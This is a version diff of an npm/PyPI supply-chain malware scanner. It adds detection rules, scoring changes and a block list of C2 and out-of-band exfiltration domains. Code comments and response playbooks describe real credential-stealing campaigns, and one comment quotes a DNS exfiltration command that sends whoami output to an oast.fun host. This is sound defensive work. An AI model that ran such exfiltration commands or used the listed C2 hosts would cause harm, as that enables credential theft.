muaddib-scanner 2.10.92 → 2.10.94

package/README.md

@@ -292,7 +292,7 @@ repos:
 | **FPR** (Benign random) | **7.5%** (15/200) | 200 random npm packages, stratified sampling |
 | **ADR** (Adversarial + Holdout) | **96.3%** (103/107) | 67 adversarial + 40 holdout (107 available on disk), global threshold=20 |
 
-**3134 tests** across 66 files. **200 rules** (195 RULES + 5 PARANOID).
+**3230 tests** across 66 files. **207 rules** (202 RULES + 5 PARANOID).
 
 > **ML retrain methodology (v2.10.51):**
 > - Ground truth: 377 confirmed_malicious via auto-labeler (OSSF malicious-packages, GitHub Advisory Database, npm registry takedown correlation)
@@ -340,7 +340,7 @@ npm test
 
 ### Testing
 
-- **3134 tests** across 66 modular test files
+- **3230 tests** across 66 modular test files
 - **56 fuzz tests** - Malformed inputs, ReDoS, unicode, binary
 - **Datadog 17K benchmark** - 14,587 confirmed malware samples (in-scope)
 - **Ground truth validation** - 67 real-world attacks (93.75% TPR@3, 85.9% TPR@20)
@@ -362,7 +362,7 @@ npm test
 - [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) - Experimental protocol, holdout scores
 - [Threat Model](docs/threat-model.md) - What MUAD'DIB detects and doesn't detect
 - [Adversarial Evaluation](ADVERSARIAL.md) - Red team samples and ADR results
-- [Security Policy](SECURITY.md) - Detection rules reference (200 rules)
+- [Security Policy](SECURITY.md) - Detection rules reference (207 rules)
 - [Security Audit](docs/SECURITY_AUDIT.md) - Bypass validation report
 - [FP Analysis](docs/EVALUATION.md) - Historical false positive analysis
 

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.10.92",
+  "version": "2.10.94",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/monitor/classify.js

@@ -61,7 +61,12 @@ const HIGH_CONFIDENCE_MALICE_TYPES = new Set([
   // v2.10.89: Security review findings — always malicious regardless of lifecycle
   'curl_env_exfil',                        // curl/wget + env/base64 in lifecycle (exfiltration)
   'function_constructor_require',          // new Function.constructor("require") (RCE evasion)
-  'newsletter_auto_follow'                 // Baileys WhatsApp newsletter hijack
+  'newsletter_auto_follow',                // Baileys WhatsApp newsletter hijack
+  // v2.10.93: Security review 2026-04-10→17 findings
+  'self_destruct_eval',                    // dynamic exec + unlink __filename (csec anti-forensics)
+  // v2.10.94: MT-1 ceiling bypass for ltidi and csec under-threshold cases
+  'external_tarball_dep',                  // dep URL = tarball on third-party host (ltidi chain)
+  'function_runtime_args'                  // new Function('require','__dirname','__filename',...) pattern (csec)
 ]);
 
 // Lifecycle compound types that indicate real malicious intent beyond a simple postinstall

package/src/response/playbooks.js

@@ -881,6 +881,21 @@ const PLAYBOOKS = {
   lifecycle_env_exfil:
     'CRITIQUE: Lifecycle hook + exfiltration env via curl/wget a l\'installation. ' +
     'Machine compromise si deja installe. Rotation immediate de TOUS les secrets.',
+
+  self_destruct_eval:
+    'CRITIQUE: Execution dynamique de code (eval/new Function/Module._compile) + auto-suppression du fichier execute (unlinkSync/renameSync sur __filename). ' +
+    'Pattern anti-forensique professionnel: le malware execute son payload obfusque puis efface ses traces. Campagne csec-crypto-toolkit (avril 2026) exfiltre .env, GITHUB_TOKEN, NPM_TOKEN, AWS/SSH keys vers csec-supply-chain-attack.vercel.app, puis unlinkSync(__filename). ' +
+    'Machine compromise si deja installe. Rotation immediate de TOUS les secrets (.env, tokens CI/CD, cles SSH). Verifier les .env des repertoires parents jusqu\'a 6 niveaux. Supprimer le package.',
+
+  function_runtime_args:
+    'CRITIQUE: new Function() appele avec les identifiants runtime Node (require, __dirname, __filename) passes comme arguments string literal + corps dynamique. ' +
+    'Pattern csec-crypto-toolkit: l\'attaquant injecte le contexte Node complet dans un payload obfusque execute en memoire, contournant la detection de require() standard. Aucun package legitime n\'utilise ce pattern. ' +
+    'Lire le contenu de l\'argument body. Tracer la source (souvent XOR/base64 decode). Isoler et supprimer.',
+
+  external_tarball_dep:
+    'CRITIQUE: Dependance declaree avec URL tarball (.tgz/.tar.gz) hebergee hors des registres npm legitimes (github.com, gitlab.com, bitbucket.org, registry.npmjs.org). ' +
+    'Pattern ltidi chain attack (avril 2026): le stub publie sur npm n\'a aucun install hook visible, la charge utile est hebergee sur un cloud storage (GCS, S3, CDN) et contourne entierement l\'audit du registre npm. ' +
+    'Verifier le contenu de la tarball distante avant toute installation. Supprimer le package. Signaler au registre npm.',
 };
 
 function getPlaybook(threatType) {

package/src/rules/index.js

@@ -2264,6 +2264,42 @@ const RULES = {
     ],
     mitre: 'T1496'
   },
+  self_destruct_eval: {
+    id: 'MUADDIB-AST-089',
+    name: 'Self-Destructing Dynamic Execution',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Execution dynamique de code (eval/new Function/Module._compile) combinee a la suppression ou renommage du fichier en cours d\'execution (unlinkSync/rmSync/renameSync sur __filename, module.filename, ou require.main.filename). Anti-forensics: le malware execute son payload obfusque puis efface ses traces. Aucun package legitime ne detruit son propre source apres execution de code dynamique. Campagne csec-crypto-toolkit (avril 2026): XOR(OrDeR_7077)+base64+new Function, exfiltre .env/.ssh/.npmrc vers csec-supply-chain-attack.vercel.app, puis unlinkSync(__filename).',
+    references: [
+      'https://attack.mitre.org/techniques/T1070.004/',
+      'https://attack.mitre.org/techniques/T1140/'
+    ],
+    mitre: 'T1070.004'
+  },
+  function_runtime_args: {
+    id: 'MUADDIB-AST-090',
+    name: 'Function() with Runtime Identifiers as Arguments',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'new Function() appele avec des identifiants runtime (require, __dirname, __filename, module, exports, process) passes comme arguments string literal, et un corps dynamique (variable, expression). Pattern csec-crypto-toolkit: l\'attaquant injecte le contexte Node complet dans un payload obfusque execute en memoire, contournant la detection require() standard. Aucun package legitime ne passe require + __filename a new Function.',
+    references: [
+      'https://attack.mitre.org/techniques/T1059.007/',
+      'https://attack.mitre.org/techniques/T1027/'
+    ],
+    mitre: 'T1059.007'
+  },
+  external_tarball_dep: {
+    id: 'MUADDIB-PKG-020',
+    name: 'External Tarball Dependency URL',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Dependance declaree avec une URL tarball (.tgz/.tar.gz/.tar.bz2/.zip) hebergee hors des registres npm legitimes (github.com, gitlab.com, bitbucket.org, registry.npmjs.org, registry.yarnpkg.com). Pattern ltidi chain attack (avril 2026): le stub publie sur npm n\'a pas d\'install hook visible, la charge utile est hebergee sur un cloud storage (GCS, S3, CDN) et contourne entierement l\'audit du registre npm. Attention: MT-1 score ceiling (cap non-lifecycle a 35) bypasse via HIGH_CONFIDENCE_MALICE_TYPES.',
+    references: [
+      'https://attack.mitre.org/techniques/T1195.002/',
+      'https://attack.mitre.org/techniques/T1105/'
+    ],
+    mitre: 'T1195.002'
+  },
   version_99_preinstall: {
     id: 'MUADDIB-PKG-019',
     name: 'Dependency Confusion Version Indicator',

package/src/scanner/ast-detectors/constants.js

@@ -144,7 +144,12 @@ const GIT_HOOKS = [
 
 // Suspicious C2/exfiltration domains (HIGH severity)
 const SUSPICIOUS_DOMAINS_HIGH = [
+  // OAST (Out-of-band Application Security Testing) callback domains.
+  // Legitimate only for authorized pentesting — in published npm packages,
+  // these are always reconnaissance/exfiltration callbacks (dependency confusion, SSRF confirmation).
   'oastify.com', 'oast.fun', 'oast.me', 'oast.live',
+  'oast.online', 'oast.pro',
+  'interact.sh', 'projectdiscovery.io',
   'burpcollaborator.net', 'webhook.site', 'pipedream.net',
   'requestbin.com', 'hookbin.com', 'canarytokens.com',
   // GlassWorm C2 IPs (mars 2026)
@@ -167,7 +172,11 @@ const SUSPICIOUS_DOMAINS_HIGH = [
   'minhdong.site',                                 // Facebook credential proxy (fca-mmtat)
   'ltidi.storage.googleapis.com',                  // KuCoin dependency confusion payload
   'jsonkeeper.com',                                // Robert King campaign C2 dead drop
-  'npoint.io'                                      // Robert King campaign C2 dead drop
+  'npoint.io',                                     // Robert King campaign C2 dead drop
+  // v2.10.93: Security review 2026-04-10→17 findings
+  'csec-supply-chain-attack.vercel.app',           // csec-crypto-toolkit credential stealer C2 (XOR+Function+unlink)
+  'files.giftedtech.co.ke',                        // silva-baileys V3 newsletter JID remote loader
+  'phish.sh'                                       // JET/SkipTheDishes depconf webhook exfil
 ];
 
 // Suspicious tunnel/proxy domains (MEDIUM severity)

package/src/scanner/ast-detectors/handle-new-expression.js

@@ -11,6 +11,35 @@ const {
 
 function handleNewExpression(node, ctx) {
   if (node.callee.type === 'Identifier' && node.callee.name === 'Function') {
+    // v2.10.94: detect new Function('require', '__dirname', '__filename', <dynamic>)
+    // csec-crypto-toolkit pattern. Gated by obfuscation signal to avoid FP on
+    // legitimate CommonJS module wrappers used by babel-register, ts-node, pirates,
+    // jest, nyc, vitest etc. which call new Function('module', 'exports', 'require',
+    // compiledCode). Those transpilers DO NOT have fromCharCode/base64 decode loops
+    // in the same file — csec does.
+    if (node.arguments.length >= 3) {
+      const RUNTIME_ARG_NAMES = new Set(['require', '__dirname', '__filename', 'module', 'exports', 'process']);
+      const bodyArg = node.arguments[node.arguments.length - 1];
+      const argNameLiterals = node.arguments.slice(0, -1)
+        .map(a => (a.type === 'Literal' && typeof a.value === 'string') ? a.value : null);
+      const runtimeArgCount = argNameLiterals.filter(v => v !== null && RUNTIME_ARG_NAMES.has(v)).length;
+      const bodyIsDynamic = bodyArg.type !== 'Literal';
+      // FP gate: require an obfuscation/decode signal in the same file.
+      // ctx.hasFromCharCode catches XOR/charcode loops (csec).
+      // ctx.hasBase64Decode catches Buffer.from(..., 'base64') patterns.
+      // ctx.hasZlibInflate catches zlib + base64 payloads.
+      const hasObfuscationContext = ctx.hasFromCharCode || ctx.hasBase64Decode || ctx.hasZlibInflate;
+      if (runtimeArgCount >= 2 && bodyIsDynamic && hasObfuscationContext) {
+        ctx.hasDynamicExec = true;
+        ctx.threats.push({
+          type: 'function_runtime_args',
+          severity: 'CRITICAL',
+          message: `new Function() passes runtime identifiers (${argNameLiterals.filter(Boolean).join(', ')}) to a dynamic body in a file containing decode/obfuscation patterns — csec-style obfuscated payload with full Node.js context.`,
+          file: ctx.relFile
+        });
+        return;
+      }
+    }
     // Skip string literal args — zero-risk globalThis polyfills used by every bundler
     if (!hasOnlyStringLiteralArgs(node)) {
       ctx.hasDynamicExec = true;

package/src/scanner/ast-detectors/handle-post-walk.js

@@ -23,6 +23,26 @@ function handlePostWalk(ctx) {
     });
   }
 
+  // v2.10.93: csec-style credential stealer — dynamic exec + self-deletion of __filename.
+  // csec-crypto-toolkit (avril 2026): XOR-obfuscated setup.js that exfiltrates
+  // .env/.ssh/.npmrc to csec-supply-chain-attack.vercel.app, then unlinks itself
+  // and replaces package.json with package.md to erase traces.
+  // Threat model: the combination of (a) dynamic code execution from a variable
+  // (eval/new Function/Module._compile) with (b) self-deletion of the currently
+  // executing file is a professional anti-forensics signature. Legitimate packages
+  // do not destroy their own source after executing obfuscated code.
+  // Suppressed in dist/build to avoid bundler self-cleanup FPs (rare but possible).
+  if (ctx.hasDynamicExec && ctx.hasSelfDelete) {
+    const isDistFile = /^(dist|build|out|output)[/\\]/i.test(ctx.relFile) ||
+                       /\.(bundle|min)\.js$/i.test(ctx.relFile);
+    ctx.threats.push({
+      type: 'self_destruct_eval',
+      severity: isDistFile ? 'HIGH' : 'CRITICAL',
+      message: 'Anti-forensics: dynamic code execution (eval/new Function/Module._compile) + self-deletion of __filename — malware staging with trace removal (csec pattern).',
+      file: ctx.relFile
+    });
+  }
+
   // SANDWORM_MODE R7: env harvesting = Object.entries/keys/values(process.env) + sensitive pattern in file
   if (ctx.hasEnvEnumeration && ctx.hasEnvHarvestPattern && ctx.hasNetworkCallInFile) {
     ctx.threats.push({

package/src/scanner/ast.js

@@ -140,6 +140,10 @@ function analyzeFile(content, filePath, basePath) {
     hasTempFileExec: false,
     hasFileDelete: false,
     hasDevShmInContent: /\/dev\/shm\b/.test(content),
+    // v2.10.93: csec-style self-deletion — unlink/rename of __filename targets the
+    // executing file itself. Distinct from hasFileDelete (any file). Combined with
+    // hasDynamicExec in a compound to flag anti-forensics obfuscated stealers.
+    hasSelfDelete: /\b(?:unlinkSync|unlink|rmSync|renameSync|rm)\s*\(\s*(?:__filename|module\.filename|require\.main\.filename)\b/.test(content),
     // SANDWORM_MODE P2: env harvesting co-occurrence
     hasEnvEnumeration: false,  // Object.entries/keys/values(process.env)
     hasEnvHarvestPattern: /\b(KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|NPM|AWS|SSH|WEBHOOK)\b/.test(content),

package/src/scanner/package.js

@@ -119,15 +119,17 @@ async function scanPackageJson(targetPath) {
       // v2.10.89: curl/wget + env/base64 exfiltration in lifecycle scripts
       // Catches: apache-arrow-14 (score 9→CRITICAL), @signals-notebook (score 9→CRITICAL)
       // Pattern: curl -d $(env|base64) URL, curl -X POST URL?env=$(env|base64 -w0)
+      // v2.10.94: extended to ping/nslookup/dig/host/getent — DNS exfil variants.
+      // Catches: koa-v3@9.4.0 which uses `ping -c 1 $(whoami).<hex>.oast.fun` instead of curl.
       if (['preinstall', 'install', 'postinstall'].includes(scriptName) &&
-          /\b(curl|wget)\b/.test(scriptContent) &&
+          /\b(curl|wget|ping|nslookup|dig|host|getent)\b/.test(scriptContent) &&
           (/\$\(.*\b(env|id|whoami|uname|hostname)\b/.test(scriptContent) ||
            (/\bbase64\b/.test(scriptContent) && !/\|\s*(sh|bash)\b/.test(scriptContent)))) {
         // Exclude curl|sh which is already caught by lifecycle_shell_pipe
         threats.push({
           type: 'curl_env_exfil',
           severity: 'CRITICAL',
-          message: `Critical: "${scriptName}" uses curl/wget with env/base64 exfiltration — credential theft via lifecycle script.`,
+          message: `Critical: "${scriptName}" uses DNS/HTTP exfil tool (curl/wget/ping/nslookup/dig) with env/base64 payload — credential theft via lifecycle script.`,
           file: 'package.json'
         });
       }
@@ -324,11 +326,46 @@ async function scanPackageJson(targetPath) {
         /\/\/192\.168\.\d{1,3}\.\d{1,3}[:/]/,
         /\/\/172\.(1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}[:/]/
       ].some(p => p.test(urlLower));
+
+      // v2.10.93: External raw tarball URL as dep — ltidi chain attack pattern.
+      // GitHub/GitLab/Bitbucket release tarballs are legitimate; everything else
+      // pointing to .tgz/.tar.gz/.zip is payload delivery via third-party storage
+      // (GCS, S3, CDNs). The stub package bypasses all lifecycle/obfuscation scanners
+      // because the malicious code lives in the external tarball fetched at install.
+      const isTarballUrl = /\.(tgz|tar\.gz|tar\.bz2|zip)(\?|#|$)/.test(urlLower);
+      const isLegitTarballHost = [
+        /\/\/github\.com\//,
+        /\/\/codeload\.github\.com\//,
+        /\/\/objects\.githubusercontent\.com\//,
+        /\/\/gitlab\.com\//,
+        /\/\/bitbucket\.org\//,
+        /\/\/registry\.npmjs\.org\//,
+        /\/\/registry\.yarnpkg\.com\//
+      ].some(p => p.test(urlLower));
+      const isExternalTarball = isTarballUrl && !isLegitTarballHost;
+
+      let severity;
+      let note;
+      if (isSuspicious) {
+        severity = 'CRITICAL';
+        note = ' (tunnel/private/localhost)';
+      } else if (isExternalTarball) {
+        severity = 'CRITICAL';
+        note = ' (external raw tarball on third-party host — chain attack pattern, npm registry audit bypass)';
+      } else {
+        severity = 'HIGH';
+        note = ' (unusual, verify source)';
+      }
+
+      // v2.10.94: External tarball on third-party host emits a distinct type
+      // so MT-1 score ceiling (caps non-lifecycle, non-HC packages at 35) can be
+      // bypassed via HIGH_CONFIDENCE_MALICE_TYPES. ltidi stubs have no install
+      // hooks, so the dep URL is the only signal and must be HC-classified.
+      const threatType = isExternalTarball ? 'external_tarball_dep' : 'dependency_url_suspicious';
       threats.push({
-        type: 'dependency_url_suspicious',
-        severity: isSuspicious ? 'CRITICAL' : 'HIGH',
-        message: `Dependency "${depName}" uses HTTP URL: ${depVersion}` +
-          (isSuspicious ? ' (tunnel/private/localhost)' : ' (unusual, verify source)'),
+        type: threatType,
+        severity,
+        message: `Dependency "${depName}" uses HTTP URL: ${depVersion}${note}`,
         file: 'package.json'
       });
     }

package/src/scoring.js

@@ -118,7 +118,9 @@ const PACKAGE_LEVEL_TYPES = new Set([
   'lifecycle_missing_script',
   // v2.10.89: Security review compounds
   'lifecycle_newsletter_hijack', 'lifecycle_env_exfil',
-  'curl_env_exfil', 'version_99_preinstall'
+  'curl_env_exfil', 'version_99_preinstall',
+  // v2.10.94: new package-level type for ltidi chain attack (dep URL on third-party host)
+  'external_tarball_dep'
 ]);
 
 /**
@@ -253,6 +255,9 @@ const DIST_EXEMPT_TYPES = new Set([
   'npm_publish_worm',         // exec("npm publish") (worm propagation)
   'curl_env_exfil',           // curl/wget env exfil in lifecycle (always malicious)
   'function_constructor_require', // new Function.constructor("require") (always malicious)
+  'self_destruct_eval',       // dynamic exec + unlink __filename (csec anti-forensics)
+  'function_runtime_args',    // new Function('require','__dirname','__filename',...) + obfuscation (csec)
+  'external_tarball_dep',     // dep URL tarball on third-party host (ltidi chain)
   // Dangerous shell commands in dist/ are real threats, never bundler output
   'dangerous_exec',
   // Compound scoring rules — co-occurrence signals, never FP
@@ -893,6 +898,16 @@ function calculateRiskScore(deduped, intentResult) {
   if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL')) {
     packageScore = Math.max(packageScore, 50);
   }
+  // v2.10.94: Co-occurrence floor — 2+ distinct CRITICAL package-level types (different
+  // threat types, not duplicates) is a near-unambiguous malware signature. Lifts to 75
+  // (CRITICAL tier) so the final risk level reflects real severity instead of stopping
+  // at HIGH. Catches apache-arrow-14 (curl_env_exfil + lifecycle_env_exfil compound).
+  const criticalPkgTypes = new Set(
+    packageLevelThreats.filter(t => t.severity === 'CRITICAL').map(t => t.type)
+  );
+  if (criticalPkgTypes.size >= 2) {
+    packageScore = Math.max(packageScore, 75);
+  }
 
   // 5. Cross-file bonus: aggregate signal from non-max files
   // A package with 3 files each scoring 20 is more suspicious than 1 file scoring 20.